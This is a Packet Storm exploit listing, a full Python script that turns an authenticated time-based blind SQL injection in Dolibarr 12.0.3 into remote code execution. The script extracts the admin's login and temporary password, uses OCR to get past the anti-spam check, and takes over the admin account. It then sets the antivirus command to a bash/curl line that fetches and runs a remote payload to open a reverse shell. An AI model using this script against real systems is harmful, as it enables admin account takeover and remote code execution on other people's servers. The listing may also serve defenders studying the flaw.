Lucene search

K
packetstormCoiffeurPACKETSTORM:160448
History: Dec 11, 2020 - 12:00 a.m.

Dolibarr 12.0.3 SQL Injection / Remote Code Execution

2020-12-11 00:00:00
coiffeur
packetstormsecurity.com
502
# Exploit Title: Dolibarr 12.0.3, SQLi to RCE
# Date: 2/12/2020  
# Exploit Author: coiffeur  
# Write Up: https://therealcoiffeur.github.io/c10010, https://therealcoiffeur.github.io/c10011  
# Vendor Homepage: https://www.dolibarr.org/  
# Software Link: https://www.dolibarr.org/downloads.php, https://sourceforge.net/projects/dolibarr/files/Dolibarr%20ERP-CRM/12.0.3/  
# Version: 12.0.3  
  
import argparse  
import binascii  
import random  
import re  
from io import BytesIO  
from urllib.parse import quote_plus as qp  
  
import bcrypt  
import pytesseract  
import requests  
from bs4 import BeautifulSoup  
from PIL import Image  
  
# Average response time measured by evaluate_delay(); None until it has run.
DELTA = None
# Truthy value enables the progress messages guarded by `if DEBUG:`.
DEBUG = 1
# Single HTTP session shared by every request helper so cookies persist.
SESSION = requests.session()
# Fraction of DELTA a response time must reach to count as "delayed".
# (The spelling is kept as-is: the name is referenced throughout the file.)
TRESHOLD = 0.80
# Number of seconds passed to SLEEP() in the timing payloads.
DELAY = 1
# LIKE pattern used to locate one table name in information_schema.tables.
LIKE = "%_subscription"
# Columns read by get_row().
COLUMNS = ["login", "pass_temp"]
  
  
def usage():
    """Print the command-line help banner and terminate the process.

    Raises:
        SystemExit: always, with exit code -1.
    """
    # Local import: the file's import block does not provide `sys`, and the
    # bare `exit()` helper only exists when the `site` module is loaded.
    import sys

    banner = """NAME: Dolibarr SQLi to RCE (authenticate)
SYNOPSIS: python3 sqli_to_rce_12.0.3.py -t <BASE_URL> -u <USERNAME> -p <PASSWORD>
EXAMPLE:
python3 sqli_to_rce_12.0.3.py -t "http://127.0.0.1/projects/dolibarr/12.0.3/htdocs/" -u test -p test
AUTHOR: coiffeur
"""
    print(banner)
    sys.exit(-1)
  
  
def hex(text):
    """Return *text* (UTF-8 encoded) as a ``0x``-prefixed lowercase hex string.

    Note: this intentionally keeps the file's existing name, which shadows
    the ``hex`` builtin for the rest of the module.
    """
    encoded = text.encode()
    return f"0x{encoded.hex()}"
  
  
def hash(password):
    """Return a bcrypt hash of *password* as text, using a freshly generated salt.

    Note: the name shadows the ``hash`` builtin for the rest of the module.
    """
    digest = bcrypt.hashpw(password.encode(), bcrypt.gensalt())
    return digest.decode()
  
  
def authenticate(url, username, password):
    """Submit the login form at ``{url}index.php`` through the shared session.

    Args:
        url: Base URL; ``index.php`` is appended to it directly.
        username: Login name to submit.
        password: Password to submit.

    Returns:
        1 when the server answers with HTTP 302, otherwise 0.
    """
    form = {
        "actionlogin": "login",
        "loginfunction": "loginfunction",
        "username": username,
        "password": password,
    }
    # Redirects are not followed so the 302 itself can be inspected.
    response = SESSION.post(
        f"{url}index.php", data=form, allow_redirects=False, verify=False
    )
    logged_in = response.status_code == 302
    if DEBUG:
        if logged_in:
            print(f" [*] Authenticated as: {username}")
        else:
            print("[x] Authentication failed!")
    return 1 if logged_in else 0
  
  
def get_antispam_code(base_url):
    """Fetch the anti-spam image and return the 5-character code read from it.

    The image is requested from ``{base_url}core/antispamimage.php`` and the
    first line of the OCR output is used as the candidate. A candidate is
    accepted only when it is exactly five characters long and every character
    belongs to the allowed alphabet; otherwise a new image is requested.

    The image bytes are decoded directly from memory. The previous
    implementation wrote each image to a randomly named file under ``/tmp``
    that was never removed, only to read it straight back.

    Args:
        base_url: Base URL; the image path is appended to it directly.

    Returns:
        The accepted 5-character code.

    Note:
        As before, there is no retry limit: the loop runs until a candidate
        passes validation.
    """
    allowed = "aAbBCDeEFgGhHJKLmMnNpPqQRsStTuVwWXYZz2345679"
    while True:
        r = SESSION.get(f"{base_url}core/antispamimage.php", verify=False)
        text = pytesseract.image_to_string(Image.open(BytesIO(r.content)))
        candidate = text.split("\n")[0]
        if len(candidate) == 5 and all(char in allowed for char in candidate):
            return candidate
  
  
def reset_password(url, login):
    """Submit the "password forgotten" form for *login*, retrying up to 5 times.

    Each attempt obtains a fresh anti-spam code via ``get_antispam_code`` and
    posts it to ``{url}user/passwordforgotten.php``. An attempt succeeds when
    the response is HTTP 200 and its body contains one of the known
    confirmation sentences (English or French).

    The previous implementation tested ``r.text.find(...)`` for truthiness.
    ``str.find`` returns -1 (truthy) when the text is absent, so every 200
    response was reported as a success; a substring test is used instead.

    Args:
        url: Base URL; the form path is appended to it directly.
        login: Account name to submit in the form.

    Returns:
        1 when a confirmation sentence was found, 0 after five failed attempts.
    """
    endpoint = f"{url}user/passwordforgotten.php"
    confirmations = (
        f"Request to change password for {login} sent to",
        f"Demande de changement de mot de passe pour {login} envoyée",
    )
    for _ in range(5):
        code = get_antispam_code(url)
        headers = {"Referer": endpoint}
        datas = {
            "action": "buildnewpassword",
            "username": login,
            "code": code,
        }
        r = SESSION.post(url=endpoint, data=datas, headers=headers, verify=False)
        if r.status_code == 200 and any(text in r.text for text in confirmations):
            if DEBUG:
                print(f" [*] Password reset using code: {code}")
            return 1
    return 0
  
  
def change_password(url, login, pass_temp):
    """Request the ``validatenewpassword`` action for *login*.

    The request is sent with a plain ``requests.get`` (not the shared
    session) and carries the URL-quoted login plus a bcrypt hash of
    *pass_temp* in the query string.

    Returns:
        1 when the server answers with HTTP 302, otherwise 0.
    """
    target = (
        f"{url}user/passwordforgotten.php?action=validatenewpassword"
        f"&username={qp(login)}&passwordhash={hash(pass_temp)}"
    )
    response = requests.get(url=target, allow_redirects=False, verify=False)
    if response.status_code != 302:
        return 0
    if DEBUG:
        print(f" [*] Password changed: {pass_temp}")
    return 1
  
  
def change_binary(url, command, parameters):
    """Post the security-file settings form with the given antivirus values.

    Args:
        url: Base URL; ``admin/security_file.php`` is appended to it directly.
        command: Value sent as ``MAIN_ANTIVIRUS_COMMAND``.
        parameters: Value sent as ``MAIN_ANTIVIRUS_PARAM``.

    Returns:
        1 when the response is HTTP 200 and contains a known success
        sentence (English or French), otherwise 0.
    """
    endpoint = f"{url}admin/security_file.php"
    form = {
        "action": "updateform",
        "MAIN_UPLOAD_DOC": "2048",
        "MAIN_UMASK": "0664",
        "MAIN_ANTIVIRUS_COMMAND": command,
        "MAIN_ANTIVIRUS_PARAM": parameters,
    }
    response = SESSION.post(
        url=endpoint, data=form, headers={"Referer": endpoint}, verify=False
    )
    if response.status_code != 200:
        return 0
    success_markers = (
        "Record modified successfully",
        "Enregistrement modifié avec succès",
    )
    if not any(marker in response.text for marker in success_markers):
        return 0
    if DEBUG:
        print(" [*] Binary's path changed")
    return 1
  
  
def trigger_exploit(url):
    """Upload ``junk.txt`` through the security-file form and check the reply.

    The local file ``junk.txt`` is opened inside a ``with`` block so the
    handle is closed once the request completes; the previous implementation
    never closed it.

    Args:
        url: Base URL; ``admin/security_file.php`` is appended to it directly.

    Returns:
        1 when the response is HTTP 200 and contains one of the known result
        sentences (English or French), otherwise 0.

    Raises:
        OSError: if ``junk.txt`` cannot be opened in the working directory.
    """
    endpoint = f"{url}admin/security_file.php"
    headers = {"Referer": endpoint}
    datas = {"sendit": "Upload"}
    expected = (
        "File(s) uploaded successfully",
        "The antivirus program was not able to validate the file (file might be infected by a virus)",
        "Fichier(s) téléversés(s) avec succès",
        "L'antivirus n'a pas pu valider ce fichier (il est probablement infecté par un virus) !",
    )
    with open("junk.txt", "rb") as upload:
        files = {"userfile[]": upload}
        if DEBUG:
            print(f" [*] Triggering reverse shell")
        r = SESSION.post(url=endpoint, files=files, data=datas,
                         headers=headers, verify=False)
    if r.status_code == 200 and any(text in r.text for text in expected):
        if DEBUG:
            print(f" [*] Exploit done")
        return 1
    return 0
  
  
def get_version(url):
    """Read the version banner from ``{url}index.php`` and compare it to 12.0.3.

    The dots in the pattern are escaped so they match literal dots only (the
    previous pattern let ``.`` match any character), and the captured version
    number is compared for equality rather than by substring, so a value such
    as ``12.0.30`` is no longer accepted.

    Args:
        url: Base URL; ``index.php`` is appended to it directly.

    Returns:
        1 when the page reports version 12.0.3, otherwise 0.
    """
    r = SESSION.get(f"{url}index.php", verify=False)
    match = re.search(
        r"Version Dolibarr ([0-9]{1,2}\.[0-9]{1,2}\.[0-9]{1,2})", r.text)
    if match and match.group(1) == "12.0.3":
        if DEBUG:
            print(f" [*] {match.group(0)} (exploit should work)")
        return 1
    if DEBUG:
        print(f"[*] Version may not be vulnerable")
    return 0
  
  
def get_privileges(url):
    """Check whether the logged-in user's permission page lists order reading.

    The first ``id=<digits>`` occurrence on ``{url}index.php`` is appended as
    the query string of ``user/perms.php``. The resulting page is scanned for
    ``<img>`` tags titled "Actif"/"Active"; for each one, the ``<td>`` cells of
    the image's grandparent element are tested against the known privilege
    labels (French and English).

    The pattern now captures every digit of the id (``\\d+``); the previous
    ``\\d`` kept only the first digit, truncating ids of 10 or more. The
    local variable is also no longer named ``id``, which shadowed the builtin.

    Args:
        url: Base URL; page paths are appended to it directly.

    Returns:
        1 when a matching privilege label is found, otherwise 0.
    """
    privileges = [
        "Consulter les commandes clients", "Read customers orders"]
    r = SESSION.get(f"{url}index.php", verify=False)
    found = re.search(r"id=\d+", r.text)
    if found:
        id_param = found.group(0)
        if DEBUG:
            print(f" [*] id found: {id_param}")
        r = SESSION.get(f"{url}user/perms.php?{id_param}", verify=False)
        soup = BeautifulSoup(r.text, 'html.parser')
        for img in soup.find_all("img"):
            if img.get("title") in ["Actif", "Active"]:
                for td in img.parent.parent.find_all("td"):
                    for privilege in privileges:
                        # NOTE(review): `in` on a bs4 Tag presumably tests its
                        # direct children, so the label must be an exact child
                        # string of the cell - confirm against bs4 docs.
                        if privilege in td:
                            if DEBUG:
                                print(
                                    f" [*] Check privileges: {privilege}")
                            return 1
    if DEBUG:
        print(f"[*] At the sight of the privileges, the exploit may fail")
    return 0
  
  
def check(url, payload):
    """Post *payload* as ``object_status`` and return the response time.

    Args:
        url: Base URL; ``commande/stats/index.php`` is appended to it directly.
        payload: Value sent in the ``object_status`` form field.

    Returns:
        Elapsed time of the request in seconds, as a float.
    """
    response = SESSION.post(
        url=f"{url}commande/stats/index.php",
        data={"object_status": payload},
        headers={"Referer": f"{url}commande/stats/index.php?leftmenu=orders"},
        verify=False,
    )
    elapsed = response.elapsed
    return elapsed.total_seconds()
  
  
def evaluate_delay(url):
    """Measure the average delayed response time and store it in ``DELTA``.

    Sends the always-true sleeping payload four times through ``check`` and
    assigns the mean elapsed time to the module-level ``DELTA``.
    """
    global DELTA
    probe = f"IF(0<1, SLEEP({DELAY}), SLEEP(0))"
    samples = [check(url, probe) for _ in range(4)]
    DELTA = sum(samples) / len(samples)
    if DEBUG:
        print(f" [+] Delta: {DELTA}")
  
  
def get_tbl_name_len(url):
    """Find the length of the table name matching ``LIKE`` by timing probes.

    Candidates 0 through 101 are tried in order; the payload sleeps once the
    name length is no longer greater than the candidate, and the first
    candidate whose response time reaches ``DELTA * TRESHOLD`` is returned.
    If none does, a failure message is printed and the process exits with -1.
    """
    pattern = hex(LIKE)
    for candidate in range(102):
        payload = f"IF((SELECT LENGTH(table_name) FROM information_schema.tables WHERE table_name LIKE {pattern})>{candidate}, SLEEP(0), SLEEP({DELAY}))"
        if check(url, payload) >= DELTA * TRESHOLD:
            return candidate
    print("[x] Exploit failed")
    exit(-1)
  
  
def get_tbl_name(url, length):
    """Recover the table name matching ``LIKE``, one character at a time.

    For each 1-based position up to *length*, a binary search over the code
    range 0..126 narrows down the character: a response time of at least
    ``DELTA * TRESHOLD`` means the character code is <= the probed midpoint.

    Returns:
        The reconstructed name as a string of *length* characters.
    """
    pattern = hex(LIKE)
    chars = []
    for position in range(1, length + 1):
        low, high = 0, 126
        while low < high:
            pivot = (high + low) // 2
            payload = f"IF((SELECT ASCII(SUBSTR(table_name,{position},1)) FROM information_schema.tables WHERE table_name LIKE {pattern})<={pivot}, SLEEP({DELAY}), SLEEP(0))"
            delayed = check(url, payload) >= DELTA * TRESHOLD
            if delayed:
                high = pivot
            else:
                low = pivot + 1
        chars.append(chr(low))
    return "".join(chars)
  
  
def get_elt_len(url, tbl_name, column_name):
    """Find the length of *column_name* in the first row of *tbl_name*.

    Candidates 0 through 101 are tried in order; the first one whose response
    time reaches ``DELTA * TRESHOLD`` is returned. If none does, a failure
    message is printed and the process exits with -1.
    """
    for candidate in range(102):
        payload = f"IF((SELECT LENGTH({column_name}) FROM {tbl_name} LIMIT 1)>{candidate}, SLEEP(0), SLEEP({DELAY}))"
        if check(url, payload) >= DELTA * TRESHOLD:
            return candidate
    print("[x] Exploit failed")
    exit(-1)
  
  
def get_elt(url, tbl_name, column_name, length):
    """Recover *column_name* from the first row of *tbl_name*, char by char.

    For each 1-based position up to *length*, a binary search over the code
    range 0..126 narrows down the character: a response time of at least
    ``DELTA * TRESHOLD`` means the character code is <= the probed midpoint.

    Returns:
        The reconstructed value as a string of *length* characters.
    """
    chars = []
    for position in range(1, length + 1):
        low, high = 0, 126
        while low < high:
            pivot = (high + low) // 2
            payload = f"IF((SELECT ASCII(SUBSTR({column_name},{position},1)) FROM {tbl_name} LIMIT 1)<={pivot} , SLEEP({DELAY}), SLEEP(0))"
            delayed = check(url, payload) >= DELTA * TRESHOLD
            if delayed:
                high = pivot
            else:
                low = pivot + 1
        chars.append(chr(low))
    return "".join(chars)
  
  
def get_row(url, tbl_name):
    """Read every column listed in ``COLUMNS`` from the first row of *tbl_name*.

    Returns:
        A dict mapping each column name to the recovered string value.
    """
    print(f" [*] Dump admin's infos from {tbl_name}")
    row = {}
    for column in COLUMNS:
        # Length first, then the value itself, one column at a time.
        size = get_elt_len(url, tbl_name, column)
        row[column] = get_elt(url, tbl_name, column, size)
    if DEBUG:
        print(f" [+] Infos: {row}")
    return row
  
  
def main(url, username, password):
    """Run the full sequence of steps against the instance at *url*.

    Steps, in order: log in with the supplied credentials, report version and
    privilege checks, calibrate the timing baseline, recover the table prefix,
    read the first row of the ``<prefix>user`` table, request a password reset
    for that login, re-read the row, clear the session cookies, validate the
    new password, log in again, update the antivirus settings and upload the
    trigger file.

    Any mandatory step that fails prints ``[x] Exploit failed!`` and exits
    the process with -1.

    Returns:
        0 once every step has been attempted.
    """

    def abort():
        # Shared failure path for every mandatory step.
        print("[x] Exploit failed!")
        exit(-1)

    # Pre-flight checks; only authentication is mandatory.
    print("[*] Requirements:")
    if not authenticate(url, username, password):
        abort()
    get_version(url)
    get_privileges(url)

    print("\n[*] Starting exploit:")
    # Calibrate the timing baseline before any measurement.
    evaluate_delay(url)
    print(f" [*] Extract prefix (using table: {LIKE})")
    name_length = get_tbl_name_len(url)
    full_name = get_tbl_name(url, name_length)
    prefix = f"{full_name.split('_')[0]}_"
    if DEBUG:
        print(f" [+] Prefix: {prefix}")

    # Read the first row of the user table.
    user_table_name = f"{prefix}user"
    infos = get_row(url, user_table_name)
    if not infos["login"]:
        abort()

    # Request a password reset, then re-read the row to pick up the new
    # temporary password.
    if DEBUG:
        print(f" [*] Reseting {infos['login']}'s password")
    if not reset_password(url, infos["login"]):
        abort()
    infos = get_row(url, user_table_name)

    # Drop the current cookies (logout), validate the new password, then
    # log in with the recovered credentials.
    SESSION.cookies.clear()
    login, temporary = infos['login'], infos['pass_temp']
    if not change_password(url, login, temporary):
        abort()
    authenticate(url, login, temporary)

    # Update the antivirus command settings, then upload the trigger file.
    change_binary(url, "bash", '-c "$(curl http://127.0.0.1:8000/poc.txt)"')
    trigger_exploit(url)
    return 0
  
  
if __name__ == "__main__":
    # Command-line entry point: all three options are needed; when any is
    # missing (or empty) the usage banner is shown and the process exits.
    parser = argparse.ArgumentParser()
    for flag, description in (
        ("-t", "Base URL of Dolibarr"),
        ("-u", "Username"),
        ("-p", "Password"),
    ):
        parser.add_argument(flag, help=description)
    args = parser.parse_args()

    if not (args.t and args.u and args.p):
        usage()

    main(args.t, args.u, args.p)
`